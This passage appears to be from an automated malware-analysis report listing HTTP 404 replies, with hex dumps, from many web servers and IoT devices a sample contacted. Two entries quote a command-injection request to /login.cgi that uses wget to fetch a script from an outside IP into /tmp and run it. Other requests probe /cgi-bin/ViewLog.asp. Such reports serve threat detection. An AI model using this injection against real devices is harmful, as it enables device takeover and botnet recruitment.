6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Mar 2024 04:22:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunked
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Boa/0.94.13Date: Thu, 21 Mar 2024 04:23:01 GMTContent-Type: text/htmlContent-Length: 126Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 03:40:23 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 291Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 31 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 70 3e 33 26 61 6d 70 3b 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 20 74 6f 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>501 Not Implemented</title></head><body><h1>Not Implemented</h1><p>3&amp;remoteSubmit=Save to /index.html not supported.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunkedKeep-Alive: timeout=20Content-Type: text/htmlData Raw: 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 6f 67 69 6e 2e 63 67 69 3f 63 6c 69 3d 61 61 25 32 30 61 61 25 32 37 3b 77 67 65 74 25 32 30 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 25 32 30 2d 4f 25 32 30 2d 25 33 45 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 25 32 37 24 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunkedKeep-Alive: timeout=20Content-Type: text/htmlData Raw: 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 6f 67 69 6e 2e 63 67 69 3f 63 6c 69 3d 61 61 25 32 30 61 61 25 32 37 3b 77 67 65 74 25 32 30 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 25 32 30 2d 4f 25 32 30 2d 25 33 45 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 25 32 37 24 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:56 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateVary: OriginX-Clockwork-Id: 1710994976-7778-2033127856X-Clockwork-Version: 5.1.12Server-Timing: app; dur=25.38800239563; desc="Application", timeline-event-0; dur=3.9370059967041; desc="Controller"X-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: no-cache, privateKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/jsonData Raw: 31 65 61 62 0d 0a 7b 0a 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 54 68 65 20 72 6f 75 74 65 20 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 22 2c 0a 20 20 20 20 22 65 78 63 65 70 74 69 6f 6e 22 3a 20 22 53 79 6d 66 6f 6e 79 5c 5c 43 6f 6d 70 6f 6e 65 6e 74 5c 5c 48 74 74 70 4b 65 72 6e 65 6c 5c 5c 45 78 63 65 70 74 69 6f 6e 5c 5c 4e 6f 74 46 6f 75 6e 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 2c 0a 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 22 2c 0a 20 20 20 20 22 6c 69 6e 65 22 3a 20 34 34 2c 0a 20 20 20 20 22 74 72 61 63 65 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 65 22 3a 20 31 36 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 75 6e 63 74 69 6f 6e 22 3a 20 22 68 61 6e 64 6c 65 4d 61 74 63 68 65 64 52 6f 75 74 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6c 61 73 73 22 3a 20 22 49 6c 6c 75 6d 69 6e 61 74 65 5c 5c 52 6f 75 74 69 6e 67 5c 5c 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 2d 3e 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f Data Ascii: 1eab{ "message": "The route cgi-bin/ViewLog.asp could not be found.", "exception": "Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException", "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php", "line": 44, "trace": [
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 35Connection: keep-alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Mar 2024 04:22:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 21 Mar 2024 04:22:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:22:59 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 21 Mar 2024 04:22:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:22:59 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Thu, 21 Mar 2024 04:23:08 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=utf-8X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Thu, 21 Mar 2024 05:23:08 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Thu, 21 Mar 2024 04:23:07 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:23:10 GMTServer: Apache/2Content-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 06:24:19 GMTServer: webserverX-Frame-Options: SAMEORIGINContent-Length: 195Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: THU MAR 21 07:23:11 2024Server: cwmp serverConnection: closeContent-Length: 14Content-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ReeCam IP CameraDate: Thu, 21 Mar 2024 04:25:47 GMTContent-Type: text/htmlContent-Length: 126Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 09:23:11 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: THU MAR 21 07:23:11 2024Server: cwmp serverConnection: closeContent-Length: 14Content-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
